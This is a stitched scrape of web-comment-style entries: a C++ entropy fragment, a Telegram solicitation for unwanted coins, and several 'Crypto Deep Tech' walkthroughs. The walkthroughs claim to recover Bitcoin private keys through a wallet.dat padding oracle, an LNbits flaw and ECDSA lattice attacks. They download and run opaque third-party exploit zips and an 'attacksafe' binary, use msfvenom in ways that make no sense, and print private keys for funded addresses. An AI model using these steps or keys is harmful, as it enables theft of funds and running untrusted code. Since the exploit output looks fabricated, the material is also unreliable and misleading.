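    std::printf("same seed, same 256-bit buffer: %s\n", a == b ? "yes" : "no");
    std::printf("distinct weak buffers possible: %llu\n",
                static_cast<unsigned long long>(weak_distinct_outputs()));
    Entropy s = secure_entropy();
    std::printf("first CSPRNG byte: %02x\n", static_cast<unsigned>(s[0]));
    return 0;
}
```

The buffer is 256 bits long in both forms; only the hardened one has more than 32 bits of entropy behind it.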
  4. Greetings, everyone. I am looking for people who have a ready-made coin, token or coins that are not in demand, or who do not know what to do with them. I am open to cooperation and have a proposal. tg: @der8i
  5. CRYPTO DEEP TECH

In this article we use the classification of common attack patterns from the cybersecurity resource [CAPEC™]. The “Padding Oracle Attack” on Wallet.dat was first talked about back in 2012 (on the vulnerability management and threat analysis platform “VulDB”). The problem in the most popular wallet, Bitcoin Core, affects the operation of AES Encryption Padding in the Wallet.dat file.

The technical details of this attack are known:

https://en.wikipedia.org/wiki/Padding_oracle_attack

The Padding Oracle Attack process on Wallet.dat

Let us move on to the practical part and perform a series of actions through the exploit, so as to fill the oracle in the Wallet.dat file in the process and ultimately find the password we need in binary format.

Capture The Flag (CTF)

Earlier, researchers and participants of a CTF tournament made public a cracked [wallet.dat from 2023] Bitcoin wallet: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b holding 44502.42 US dollars // BITCOIN: 1.17461256 BTC

https://btc1.trezor.io/address/1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b

Follow the link to the releases of Bitcoin Core version 22.1:

https://github.com/bitcoin/bitcoin/releases

    Index of /bin/bitcoin-core-22.1/
    ../
    test.rc1/                                   08-Nov-2022 18:08         -
    test.rc2/                                   28-Nov-2022 09:39         -
    SHA256SUMS                                  14-Dec-2022 17:59      2353
    SHA256SUMS.asc                              14-Dec-2022 17:59     10714
    SHA256SUMS.ots                              14-Dec-2022 17:59       538
    bitcoin-22.1-aarch64-linux-gnu.tar.gz       14-Dec-2022 17:59  34264786
    bitcoin-22.1-arm-linux-gnueabihf.tar.gz     14-Dec-2022 18:00  30424198
    bitcoin-22.1-osx-signed.dmg                 14-Dec-2022 18:00  14838454
    bitcoin-22.1-osx64.tar.gz                   14-Dec-2022 18:00  27930578
    bitcoin-22.1-powerpc64-linux-gnu.tar.gz     14-Dec-2022 18:00  39999102
    bitcoin-22.1-powerpc64le-linux-gnu.tar.gz   14-Dec-2022 18:00  38867643
    bitcoin-22.1-riscv64-linux-gnu.tar.gz       14-Dec-2022 18:01  34114511
    bitcoin-22.1-win64-setup.exe                14-Dec-2022 18:01  18771672
    bitcoin-22.1-win64.zip                      14-Dec-2022 18:01  34263968
    bitcoin-22.1-x86_64-linux-gnu.tar.gz        14-Dec-2022 18:01  35964880
    bitcoin-22.1.tar.gz                         14-Dec-2022 18:01   8122372
    bitcoin-22.1.torrent                        14-Dec-2022 18:01     49857

Install Bitcoin Core version 22.1

REQUIRED! Restart the QT program // Launch Bitcoin Core again

Press the keys: Ctrl + Q

Check the Bitcoin wallet 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b with the getaddressinfo command:

    getaddressinfo "address"

    Return information about the given bitcoin address.
    Some of the information will only be present if the address is in the active wallet.

Run the command:

    getaddressinfo 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b

Result:

    {
      "address": "1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b",
      "scriptPubKey": "76a9147774801e52a110aba2d65ecc58daf0cfec95a09f88ac",
      "ismine": true,
      "solvable": true,
      "desc": "pkh([7774801e]02ad103ef184f77ab673566956d98f78b491f3d67edc6b77b2d0dfe3e41db5872f)#qzqmjdel",
      "iswatchonly": false,
      "isscript": false,
      "iswitness": false,
      "pubkey": "02ad103ef184f77ab673566956d98f78b491f3d67edc6b77b2d0dfe3e41db5872f",
      "iscompressed": true,
      "ischange": false,
      "timestamp": 1,
      "labels": [
        ""
      ]
    }

Run the dumpprivkey command to obtain the private key of the Bitcoin wallet: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b

    dumpprivkey "address"

    Reveals the private key corresponding to 'address'.
    Then the importprivkey can be used with this output

Run the command:

    dumpprivkey 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b

Result:

    Error: Please enter the wallet passphrase with walletpassphrase first. (code -13)

passphrase ?!?!? passphrase ?!?!? passphrase ?!?!?
Let us launch the Padding Oracle Attack on Wallet.dat and decrypt the password into binary format. For this we need to install the Bitcoin Core integration/staging tree repositories (to do so you can open the ready-made Jupyter Notebook file and load it into a Google Colab notebook) https://colab.research.google.com/drive/1rBVTPyePTMjwXganiwkHfz59vcAtN5Wt https://github.com/demining/CryptoDeepTools/tree/main/27PaddingOracleAttackonWalletdat Padding_Oracle_Attack_on_Wallet_dat.ipynb Install Ruby in Google Colab !sudo apt install ruby-full !ruby --version Version: ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux-gnu] !gem install bitcoin-ruby !gem install ecdsa !gem install base58 !gem install crypto !gem install config-hash -v 0.9.0 Install Metasploit Framework and use MSFVenom !git clone https://github.com/rapid7/metasploit-framework.git ls cd metasploit-framework/ ls Options: !./msfvenom -help Install the Bitcoin Core integration/staging tree in Google Colab: !git clone https://github.com/bitcoin/bitcoin.git ls Go through the directory to the file aes.cpp to integrate the exploit for launching the Padding Oracle Attack on Wallet.dat cd bitcoin/src/crypto/ ls Open the file aes.cpp with the cat utility cat aes.cpp To carry out the attack, download the file wallet.dat into the directory bitcoin/src/crypto/ !wget https://github.com/demining/CryptoDeepTools/raw/29bf95739c7b7464beaeb51803d4d2e1605ce954/27PaddingOracleAttackonWalletdat/wallet.dat ls Go back to Metasploit Framework cd / cd content/metasploit-framework/ ls Open the folders in the directory: /modules/exploits/ ExploitDarlenePRO Download "ExploitDarlenePRO" into the directory: /modules/exploits/ cd modules/ ls cd exploits/ !wget https://darlene.pro/repository/fe9b4545d58e43c1704b0135383e5f124f36e40cb54d29112d8ae7babadae791/ExploitDarlenePRO.zip Unpack the contents of ExploitDarlenePRO.zip with the unzip utility !unzip ExploitDarlenePRO.zip Go to the directory: /ExploitDarlenePRO/ ls cd ExploitDarlenePRO/ ls To run the exploit, go back to Metasploit Framework cd / cd content/metasploit-framework/ ls
We need to determine our LHOST (Local Host), the IP address of our attacking virtual machine. Run the commands: !ip addr !hostname -I Use the MSFVenom tool to create the payload For exploitation we choose the Bitcoin wallet: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b https://btc1.trezor.io/address/1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b Launch command: !./msfvenom 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b -p modules/exploits/ExploitDarlenePRO LHOST=172.28.0.12 -f RB -o decode_core.rb -p bitcoin/src/crypto LHOST=172.28.0.12 -f CPP -o aes.cpp -p bitcoin/src/crypto LHOST=172.28.0.12 -f DAT -o wallet.dat Result: 1111111001010001100010110100011010011111011101001010111001011110010111000011101101000101010100001111000000011110010001110001110001011000111101001101110010010010101001101011110100010010100011011011001010111100110100110011100100001110110101001110111011100101 We need to save the resulting binary format to the file walletpassphrase.txt; we will use a Python script. Command: import hashlib Binary = "1111111001010001100010110100011010011111011101001010111001011110010111000011101101000101010100001111000000011110010001110001110001011000111101001101110010010010101001101011110100010010100011011011001010111100110100110011100100001110110101001110111011100101" f = open("walletpassphrase.txt", 'w') f.write("walletpassphrase " + Binary + " 60" + "\n") f.write("" + "\n") f.close() Open the file: walletpassphrase.txt ls cat walletpassphrase.txt Result: walletpassphrase 1111111001010001100010110100011010011111011101001010111001011110010111000011101101000101010100001111000000011110010001110001110001011000111101001101110010010010101001101011110100010010100011011011001010111100110100110011100100001110110101001110111011100101 60 The password for access to the private key has been found! 
Commands: walletpassphrase 1111111001010001100010110100011010011111011101001010111001011110010111000011101101000101010100001111000000011110010001110001110001011000111101001101110010010010101001101011110100010010100011011011001010111100110100110011100100001110110101001110111011100101 60 dumpprivkey 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b KyAqkBWTbeR3w4RdzgT58R5Rp7RSL6PfdFDEkJbwjCcSaRgqg3Vz Private key obtained! pip3 install bitcoin-utils Run the code to verify that the Bitcoin address matches: Private key WIF: KyAqkBWTbeR3w4RdzgT58R5Rp7RSL6PfdFDEkJbwjCcSaRgqg3Vz Public key: 02ad103ef184f77ab673566956d98f78b491f3d67edc6b77b2d0dfe3e41db5872f Address: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b Hash160: 7774801e52a110aba2d65ecc58daf0cfec95a09f -------------------------------------- The message to sign: CryptoDeepTech The signature is: ILPeG1ThZ0XUXz3iPvd0Q6ObUTF7SxmnhUK2q0ImEeepcZ00npIRqMWOLEfWSJTKd1g56CsRFa/xI/fRUQVi19Q= The signature is valid! Open bitaddress and check: ADDR: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b WIF: KyAqkBWTbeR3w4RdzgT58R5Rp7RSL6PfdFDEkJbwjCcSaRgqg3Vz HEX: 3A32D38E814198CC8DD20B49752615A835D67041C4EC94489A61365D9B6AD330 https://www.blockchain.com/en/explorer/addresses/btc/1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b BALANCE: $ 44502.42 References: [1] Practical Padding Oracle Attacks (Juliano Rizzo, Thai Duong) [2010] [2] Efficient Padding Oracle Attacks on Cryptographic Hardware (Romain Bardou, Riccardo Focardi, Yusuke Kawamoto, Lorenzo Simionato, Graham Steel, Joe-Kai Tsay) [3] Security Flaws Induced by CBC Padding Applications to SSL, IPSEC, WTLS… (Serge Vaudenay) [4] Padding Oracle Attack on PKCS#1 v1.5: Can Non-standard Implementation Act as a Shelter (Si Gao, Hua Chen, and Limin Fan) [5] Attacks and Defenses (Dr. Falko Strenzke) [2020]
[6] CBC padding oracle attacks [2023] [7] Fun with Padding Oracles (Justin Clarke) [OWASP London Chapter] [8] Practical Padding Oracle Attacks on RSA (Riccardo Focardi) [9] The Padding Oracle Attack (Fionn Fitzmaurice) [2018] [10] Exploiting CBC Padding Oracles (Eli Sohl) [2021] [11] Partitioning Oracle Attacks (Julia Len, Paul Grubbs, Thomas Ristenpart) [Cornell Tech] [12] Padding and CBC Mode (David Wagner and Bruce Schneier) [1997] [13] Padding Oracle Attacks (methodology) [14] Padding Oracle Attack (Introduction Packet Encryption Mode CTF Events) This material was created for the CRYPTO DEEP TECH portal to ensure the financial security of data and of elliptic-curve secp256k1 cryptography against weak ECDSA signatures in the BITCOIN cryptocurrency. The creators of the software are not responsible for the use of the materials. Source code Telegram: https://t.me/cryptodeeptech Video: https://youtu.be/0aCfT-kCRlw Source: https://cryptodeep.ru/padding-oracle-attack-on-wallet-dat Cryptanalysis
  6. !git clone https://github.com/lnbits/lnbits.git ls Open the vulnerable file quasar.umd.js with the cat utility cat lnbits/lnbits/static/vendor/quasar.umd.js Open the folders in the directory: /modules/exploits/ ExploitDarlenePRO Download "ExploitDarlenePRO" into the directory: /modules/exploits/ cd modules/ ls cd exploits/ !wget https://darlene.pro/repository/21fa0f866f9f5fd22ce045e57f22185de1877dee25ad9d3974b7167a78957680/ExploitDarlenePRO.zip Unpack the contents of ExploitDarlenePRO.zip with the unzip utility !unzip ExploitDarlenePRO.zip Go to the directory: /ExploitDarlenePRO/ ls cd ExploitDarlenePRO/ ls To run the exploit, go back to Metasploit Framework cd / cd content/metasploit-framework/ ls We need to determine our LHOST (Local Host), the IP address of our attacking virtual machine. Run the commands: !ip addr !hostname -I Use the MSFVenom tool to create the payload For exploitation we choose the Bitcoin wallet: 1qzgi39y33HrM7mHsZ6FaNspHCraJe62F https://btc1.trezor.io/address/1qzgi39y33HrM7mHsZ6FaNspHCraJe62F Launch command: !./msfvenom 1qzgi39y33HrM7mHsZ6FaNspHCraJe62F -p modules/exploits/ExploitDarlenePRO LHOST=172.28.0.12 -f RB -o main.rb -p lnbits/lnbits/static/vendor LHOST=172.28.0.12 -f JS -o quasar.umd.js Result: 111111001110010001110101111111111100101000011100101000100111001101111110010101100111010110111001011100010100001000110001010011010000010111110001011101110100101001010010110110000111011010010010110000101111001000110010010100111011011111010100011111100011011 We need to save the resulting binary format to the file binary.txt; we will use the echo utility. Command: !echo '111111001110010001110101111111111100101000011100101000100111001101111110010101100111010110111001011100010100001000110001010011010000010111110001011101110100101001010010110110000111011010010010110000101111001000110010010100111011011111010100011111100011011' > binary.txt Convert the binary format to HEX format to obtain the private key of the Bitcoin wallet: 
Use the code: binaryFile = open("binary.txt", "r") binaryFile = binaryFile.readlines() hexFile = open("hex.txt", "w+") # loop through each line of binaryFile then convert and write to hexFile for line in binaryFile: binaryCode = line.replace(" ", "") hexCode = hex(int(binaryCode, 2)) hexCode = hexCode.replace("0x", "").upper().zfill(4) hexFile.write(hexCode + "\n") # close hexFile hexFile.close() Open the file: hex.txt cat hex.txt 7E723AFFE50E5139BF2B3ADCB8A118A682F8BBA5296C3B4961791929DBEA3F1B Private key found! Install the Bitcoin module !pip3 install bitcoin Run the code to verify that the Bitcoin address matches: from bitcoin import * with open("hex.txt","r") as f: content = f.readlines() # you may also want to remove whitespace characters like `\n` at the end of each line content = [x.strip() for x in content] f.close() outfile = open("privtoaddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() Open the file: privtoaddr.txt cat privtoaddr.txt Result: 7E723AFFE50E5139BF2B3ADCB8A118A682F8BBA5296C3B4961791929DBEA3F1B:1qzgi39y33HrM7mHsZ6FaNspHCraJe62F Open bitaddress and check: ADDR: 1qzgi39y33HrM7mHsZ6FaNspHCraJe62F WIF: L1TWHkT6HcNVHCjsUpGecyZQqGJC5Ek98HunmRH4c3zb8V87NUiP HEX: 7E723AFFE50E5139BF2B3ADCB8A118A682F8BBA5296C3B4961791929DBEA3F1B https://www.blockchain.com/en/explorer/addresses/btc/1qzgi39y33HrM7mHsZ6FaNspHCraJe62F BALANCE: $ 11032.77 References: [1] A Cryptoeconomic Traffic Analysis of Bitcoins Lightning Network (Ferenc Beres, Istvan A. Seres, Andras A. Benczur) [2] Flood & Loot: A Systemic Attack On The Lightning Network (Jona Harris, Aviv Zohar) [3] Short Paper: A Centrality Analysis of the Lightning Network (Philipp Zabka, Klaus-T. Foerster, Christian Decker, Stefan Schmid)
[4] Congestion Attacks in Payment Channel Networks (Ayelet Mizrahi, Aviv Zohar) [5] A Deep Dive Into Lightning as a Bitcoin Scaling Solution (George Kaloudis, Teddy Oosterbaan) [6] The Lightning Network is an overlay network powered by Bitcoin smart contracts it is NOT a blockchain (George Kaloudis, Teddy Oosterbaan) [7] Lightning Network Scalability Solutions (Joseph Poon, Thaddeus Dryja) [8] The Bitcoin Lightning Network DRAFT Version 0.5 (Joseph Poon, Thaddeus Dryja) [9] CoinPool efficient off-chain payment pools for Bitcoin (Gleb Naumenko, Antoine Riard) This material was created for the CRYPTO DEEP TECH portal to ensure the financial security of data and of elliptic-curve secp256k1 cryptography against weak ECDSA signatures in the BITCOIN cryptocurrency. The creators of the software are not responsible for the use of the materials. Source code Telegram: https://t.me/cryptodeeptech Video: https://youtu.be/ZpflbzENAAw Source: https://cryptodeep.ru/bitcoin-lightning-wallet-vulnerability Cryptanalysis
  7. CRYPTO DEEP TECH In our earliest works we published an article on the “LATTICE ATTACK” as a complete solution to the HNP [Hidden Number Problem], but with the recent appearance of the new “POLYNONCE ATTACK” we decided to supplement the article using 79 ECDSA signatures. Building on the previous article, where we took 128 bits for the polynomial, by actually increasing the number of signatures we will bring the value of the polynomial up to 249 bits. As the theoretical basis we will take the materials: “Lattice Attack on Bitcoin” https://attacksafe.ru/lattice-attack-on-bitcoin 19mJofzRwwwx4VmXuAXgX6pgM3qzJqi25z 6a941396b28a72ac834d922165995e6685a760f884dbb9e8b6dea95b01f0aae8 RawTX "hex": 010000000afa0765dc83c2e04b53a03ad9f5e7603f974c5a70e7a486bc957e72809facab7b2d0000006a4730440220746bd0443317a77c069bddae306dc658ec740bb1a6312bdcb4ce666bae42e988022066c34dd48f0e34ae4aefd28564f46fb7473d0b49d55adb716b9f04e663d0a9890121033ee89b98b1d6e71285314e1d1c753003a7a80c17f46146a91077006c76e25e7affffffff................................ Load the file: LATTICE_ATTACK_249bits.ipynb Download the HEX data with the wget utility and save it to the file RawTX.txt !wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/example1/HEX.txt with open("HEX.txt") as myfile: listfile="\n".join(f'{line.rstrip()[:+298]}' for line in myfile) f = open("RawTX.txt", 'w') f.write("" + listfile + "" + "\n") f.close() To carry out the attack we will use the “ATTACKSAFE SOFTWARE” software www.attacksafe.ru/software Access permissions: !chmod +x attacksafe ls Usage: !./attacksafe -help -version: software version -list: list of bitcoin attacks -tool: indicate the attack -gpu: enable gpu -time: work timeout -server: server mode -port: server port -open: open file -save: save file -search: vulnerability search -stop: stop at mode -max: maximum quantity in mode -min: minimum quantity per mode -speed: boost speed for mode -range: specific range -crack: crack mode -field: starting field -point: starting point 
-inject: injection regimen -decode: decoding mode !./attacksafe -version Version 5.3.4. [ATTACKSAFE SOFTWARE, © 2023] List all attacks: !./attacksafe -list Select -tool: lattice_attack Run -tool lattice_attack using the “ATTACKSAFE SOFTWARE” software !./attacksafe -tool lattice_attack -open RawTX.txt -save SignatureRSZ.csv We ran this attack from -tool lattice_attack and the result was saved to the file SignatureRSZ.csv Now, to see the successful result, open the file SignatureRSZ.csv To calculate the private key of the Bitcoin wallet from the file SignatureRSZ.csv we will install SageMath !wget https://cryptodeeptech.ru/sage-9.3-Ubuntu_20.04-x86_64.tar.bz2 !tar -xf sage-9.3-Ubuntu_20.04-x86_64.tar.bz2 cd SageMath/ ls !python3 relocate-once.py !mv '/content/attacksafe' '/content/SageMath/attacksafe' !mv '/content/SignatureRSZ.csv' '/content/SageMath/SignatureRSZ.csv' ls !wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/crack_weak_ECDSA_nonces_with_LLL.py !./sage -sh python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 249 79 > PrivateKey.txt cat PrivateKey.txt We obtained the private key of the Bitcoin wallet in HEX format PrivKey = 0x9a52a4dbcc148f1480a6fb5311252524fc498eb508c7cb8f63bbee4b9af37941 Check POLYNONCE for each ECDSA signature https://github.com/demining/CryptoDeepTools/blob/main/21LatticeAttack/example1/POLYNONCE.py Result: Thanks to the value on the secp256k1 curve from Hal Finney, LAMBDA and BETA revealed to us the same initial bits. The POLYNONCE value in HEX format allows us to fully solve the hidden number problem, obtain the private key and recover the Bitcoin wallet. 
Check the HEX of the private key: !pip3 install bitcoin from bitcoin import * with open("PrivateKey.txt","r") as f: content = f.readlines() content = [x.strip() for x in content] f.close() outfile = open("PrivateKeyAddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() 9a52a4dbcc148f1480a6fb5311252524fc498eb508c7cb8f63bbee4b9af37941:19mJofzRwwwx4VmXuAXgX6pgM3qzJqi25z Open bitaddress and check: ADDR: 19mJofzRwwwx4VmXuAXgX6pgM3qzJqi25z WIF: L2PhDrYZw6fWqeLZMnMeAXvxZ47MEnepaQVLL2EazbRhqesytoQB HEX: 9a52a4dbcc148f1480a6fb5311252524fc498eb508c7cb8f63bbee4b9af37941 https://www.blockchain.com/en/explorer/addresses/btc/19mJofzRwwwx4VmXuAXgX6pgM3qzJqi25z BALANCE: $ 1015.58 Let us look at the remaining examples: No. 2 1GPZVDUyPM6qxCsJQrpJeo14WDRVLvTZ2Z 9130c5b8e92f37d3a58dcae16daa27625cc52b698a83af7c8b891f01bfa0b2af RawTX "hex": 0100000041e981df9d37a7af6f5ee77abade3ec58acbf864f942bdecb63ea2efa593e2c3391f0000006b4830450221009d8ceef05e2fa0a623811df57265a3678f902e81dc82c3862d12bbb07b90de18022036bbed961b4f8665eb3fb3047a1398a1aeae519a8e2a1a97de57863fc0cc4a380121029755a17bf76237cde9e05fc333a255b926d526a7763abe725a4f6253ebdae109ffffffff.............................. 
!rm HEX.txt !rm RawTX.txt !rm NoncesHEX.txt !rm PrivateKey.txt !rm SignatureRSZ.csv !rm PrivateKeyAddr.txt !wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/example2/HEX.txt with open("HEX.txt") as myfile: listfile="\n".join(f'{line.rstrip()[:+298]}' for line in myfile) f = open("RawTX.txt", 'w') f.write("" + listfile + "" + "\n") f.close() Run -tool lattice_attack using the “ATTACKSAFE SOFTWARE” software !./attacksafe -tool lattice_attack -open RawTX.txt -save SignatureRSZ.csv We ran this attack from -tool lattice_attack and the result was saved to the file SignatureRSZ.csv Now, to see the successful result, open the file SignatureRSZ.csv !./sage -sh python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 249 79 > PrivateKey.txt cat PrivateKey.txt We obtained the private key of the Bitcoin wallet in HEX format PrivKey = 0x00db251a1ab7cfa7679dfe61271d0af4bb9c68595178cf4c9237478eab2dba1d Check POLYNONCE for each ECDSA signature https://github.com/demining/CryptoDeepTools/blob/main/21LatticeAttack/example2/POLYNONCE.py Result: Thanks to the value on the secp256k1 curve from Hal Finney, LAMBDA and BETA revealed to us the same initial bits. The POLYNONCE value in HEX format allows us to fully solve the hidden number problem, obtain the private key and recover the Bitcoin wallet. 
Check the HEX of the private key: from bitcoin import * with open("PrivateKey.txt","r") as f: content = f.readlines() content = [x.strip() for x in content] f.close() outfile = open("PrivateKeyAddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() Open bitaddress and check: ADDR: 1GPZVDUyPM6qxCsJQrpJeo14WDRVLvTZ2Z WIF: KwFNhRPDpgD5X77T8x5oL628aHh9UtscwwrLjGBKE8NeLshYvAqC HEX: 00db251a1ab7cfa7679dfe61271d0af4bb9c68595178cf4c9237478eab2dba1d https://www.blockchain.com/en/explorer/addresses/btc/1GPZVDUyPM6qxCsJQrpJeo14WDRVLvTZ2Z BALANCE: $ 999.10 Let us look at the remaining examples: No. 3 18Y9nUpdtxAKTh6yaN299jfUxcpJ2ApHz 0b21368bb6e6658adf4079b5ca6e7286c6e13471acef879168e7c17809476c76 RawTX "hex": 0100000041c7a8d97168ee154550f5e43b9074e5f357a4dc6b2350c96f75e377df0a39b9fa210000006b48304502210097d6b896929d77634b8d9430bc2842209cad42bb236c408e18470b9fd86b3d6a0220684ac14228c4adaa9df819e7fc8e82cf3c4242b74e27f5dd190d63231e8a058a012102990a280aef14e545b9b076b6548a4e886476d967e447bb69efcf0b725efda04effffffff.............................. 
!rm HEX.txt !rm RawTX.txt !rm NoncesHEX.txt !rm PrivateKey.txt !rm SignatureRSZ.csv !rm PrivateKeyAddr.txt !wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/example3/HEX.txt with open("HEX.txt") as myfile: listfile="\n".join(f'{line.rstrip()[:+298]}' for line in myfile) f = open("RawTX.txt", 'w') f.write("" + listfile + "" + "\n") f.close() Run -tool lattice_attack using the “ATTACKSAFE SOFTWARE” software !./attacksafe -tool lattice_attack -open RawTX.txt -save SignatureRSZ.csv We ran this attack from -tool lattice_attack and the result was saved to the file SignatureRSZ.csv Now, to see the successful result, open the file SignatureRSZ.csv !./sage -sh python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 249 79 > PrivateKey.txt cat PrivateKey.txt We obtained the private key of the Bitcoin wallet in HEX format PrivKey = 0x80e3052532356bc701189818c095fb8a7f035fd7a5a96777df4162205e945aa5 Check POLYNONCE for each ECDSA signature https://github.com/demining/CryptoDeepTools/blob/main/21LatticeAttack/example3/POLYNONCE.py Result: Thanks to the value on the secp256k1 curve from Hal Finney, LAMBDA and BETA revealed to us the same initial bits. The POLYNONCE value in HEX format allows us to fully solve the hidden number problem, obtain the private key and recover the Bitcoin wallet. 
Check the HEX of the private key: from bitcoin import * with open("PrivateKey.txt","r") as f: content = f.readlines() content = [x.strip() for x in content] f.close() outfile = open("PrivateKeyAddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() Open bitaddress and check: ADDR: 18Y9nUpdtxAKTh6yaN299jfUxcpJ2ApHz WIF: L1YFTAP2X6jhi9W6ZVy2xX8H89TYwZcgSKcPLX7NmAx3n8PjqDkU HEX: 80e3052532356bc701189818c095fb8a7f035fd7a5a96777df4162205e945aa5 https://www.blockchain.com/en/explorer/addresses/btc/18Y9nUpdtxAKTh6yaN299jfUxcpJ2ApHz BALANCE: $ 1023.25 No. 4 12fqNTJc1wj2xfNscYHAzehD6f6sRjWBor 6e6d84bc92cd79fba2d1eee5fb47e393896d44f666a50d4948a022751e3f0989 RawTX "hex": 01000000418ff67c7d3309211ab9d9629d97bbac7730d3cbb419df4ec43d2c5fc4f81bbefb1b0000006b4830450221008c223861acf1f265547eddb04a7cf98d206643a05824e56e97c70beddd18eaf20220139a34bf077a1fdb15e716d765955203e746616dfe8bf536b86d259b5c8a09b8012103c50b5619a40a23ff6a5510238405b8efd3f8f1bc442e1a415b25078b4cbd88e3ffffffff.............................. 
!rm HEX.txt !rm RawTX.txt !rm NoncesHEX.txt !rm PrivateKey.txt !rm SignatureRSZ.csv !rm PrivateKeyAddr.txt !wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/example4/HEX.txt with open("HEX.txt") as myfile: listfile="\n".join(f'{line.rstrip()[:+298]}' for line in myfile) f = open("RawTX.txt", 'w') f.write("" + listfile + "" + "\n") f.close() Run -tool lattice_attack using the “ATTACKSAFE SOFTWARE” software !./attacksafe -tool lattice_attack -open RawTX.txt -save SignatureRSZ.csv We ran this attack from -tool lattice_attack and the result was saved to the file SignatureRSZ.csv Now, to see the successful result, open the file SignatureRSZ.csv !./sage -sh python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 249 79 > PrivateKey.txt cat PrivateKey.txt We obtained the private key of the Bitcoin wallet in HEX format PrivKey = 0x9e636a4ef1a63c4bd385b8d26d29f6394a29963f12109dbf34fef74377866a32 Check POLYNONCE for each ECDSA signature https://github.com/demining/CryptoDeepTools/blob/main/21LatticeAttack/example4/POLYNONCE.py Result: Thanks to the value on the secp256k1 curve from Hal Finney, LAMBDA and BETA revealed to us the same initial bits. The POLYNONCE value in HEX format allows us to fully solve the hidden number problem, obtain the private key and recover the Bitcoin wallet. 
Check the HEX of the private key: from bitcoin import * with open("PrivateKey.txt","r") as f: content = f.readlines() content = [x.strip() for x in content] f.close() outfile = open("PrivateKeyAddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() Open bitaddress and check: ADDR: 12fqNTJc1wj2xfNscYHAzehD6f6sRjWBor WIF: L2Xbaxg8QFoLn5URp7GKMyLwEN9dV5TtgpdbXYo7WDJsHZLcT898 HEX: 9e636a4ef1a63c4bd385b8d26d29f6394a29963f12109dbf34fef74377866a32 https://www.blockchain.com/en/explorer/addresses/btc/12fqNTJc1wj2xfNscYHAzehD6f6sRjWBor BALANCE: $ 406.03 No. 5 1L8v5aUZRzYbGKWcj9Yt6mGdd95Sy9bXjN 8a00ad0cc10d768d6d2b407f99879e556e5fc2917b619cb9a551675b7682a791 RawTX "hex": "01000000fdf4014f7e4a72ecb9a3ed21a82a42b3127da87bdfee7c10779688dd8a38977cb80ece000000006a4730440220423f7cffadd494fb0148d509e67598b3c8d7f54695ee3830184adc2af234d5cf022005ebe83773bc81c7131fd0580350a998adde20fee6fd2d1da40a0191fea8242c0121027a2250a80a31965e928afff97d1c713e7ce70e6eb7c7491404a79991bfc6b5c1ffffffff........................... 
!rm HEX.txt !rm RawTX.txt !rm NoncesHEX.txt !rm PrivateKey.txt !rm SignatureRSZ.csv !rm PrivateKeyAddr.txt !wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/example5/HEX.txt with open("HEX.txt") as myfile: listfile="\n".join(f'{line.rstrip()[:+298]}' for line in myfile) f = open("RawTX.txt", 'w') f.write("" + listfile + "" + "\n") f.close() Run -tool lattice_attack using the “ATTACKSAFE SOFTWARE” software !./attacksafe -tool lattice_attack -open RawTX.txt -save SignatureRSZ.csv We ran this attack from -tool lattice_attack and the result was saved to the file SignatureRSZ.csv Now, to see the successful result, open the file SignatureRSZ.csv !./sage -sh python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 249 79 > PrivateKey.txt cat PrivateKey.txt We obtained the private key of the Bitcoin wallet in HEX format PrivKey = 0xe2eadbde2e6a2adb6f81864cdf574dd44959717fe095486e2c0e55585594edf2 Check POLYNONCE for each ECDSA signature https://github.com/demining/CryptoDeepTools/blob/main/21LatticeAttack/example5/POLYNONCE.py Result: Thanks to the value on the secp256k1 curve from Hal Finney, LAMBDA and BETA revealed to us the same initial bits. The POLYNONCE value in HEX format allows us to fully solve the hidden number problem, obtain the private key and recover the Bitcoin wallet. 
